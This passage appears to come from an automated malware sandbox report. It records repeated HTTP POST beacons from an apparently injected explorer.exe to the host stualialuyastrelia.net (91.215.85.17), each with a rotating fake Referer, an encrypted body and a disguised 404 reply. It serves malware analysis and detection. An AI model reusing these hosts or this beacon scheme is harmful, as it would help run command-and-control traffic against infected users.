                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                32192.168.2.64976891.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:13.677236080 CET333OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://vmwmngcskjub.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:13.677274942 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:13.928473949 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:13 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                33192.168.2.64976991.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:14.335408926 CET337OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://nitnmyissvphwnbc.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:14.335442066 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:14.586899996 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:14 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                34192.168.2.64977091.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:15.044356108 CET335OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://axshrmdvbkhavl.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:15.044409990 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:15.288120985 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:15 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                35192.168.2.64977191.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:15.775232077 CET336OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://dxeyqyenuurxtjf.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:15.775275946 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:16.026055098 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:15 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                36192.168.2.64977291.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:16.741205931 CET337OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://ylakdtcynxnachde.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:16.741261959 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:16.991044998 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:16 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                37192.168.2.64977391.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:17.402767897 CET333OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://ftadycrkyfgg.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:17.402807951 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:17.645942926 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:17 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                38192.168.2.64977491.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:18.043972015 CET332OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://kppwjvwswxb.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:18.044003010 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:18.281074047 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:18 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                39192.168.2.64977791.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:18.757052898 CET333OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://soramsswvwtj.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:18.757119894 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:19.003565073 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:18 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                40192.168.2.64977991.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:19.588113070 CET335OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://xsecnovmwcvurf.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:19.588165998 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:19.833486080 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:19 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                41192.168.2.64978091.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.239483118 CET334OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://bucbtcuuqjcgt.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.239506960 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.483769894 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:20 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                42192.168.2.64978191.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.928360939 CET332OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://nridljhbxir.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:20.928389072 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:21.180891991 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:21 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                43192.168.2.64978491.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:22.364379883 CET332OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://chtljmxglxo.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:22.364453077 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:22.618048906 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:22 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                44192.168.2.64978791.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:23.340187073 CET332OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://gsiqxrqycnt.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:23.384882927 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:23.626539946 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:23 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                45192.168.2.64978891.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:26.416668892 CET336OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://kalnugefedcgxyw.org/
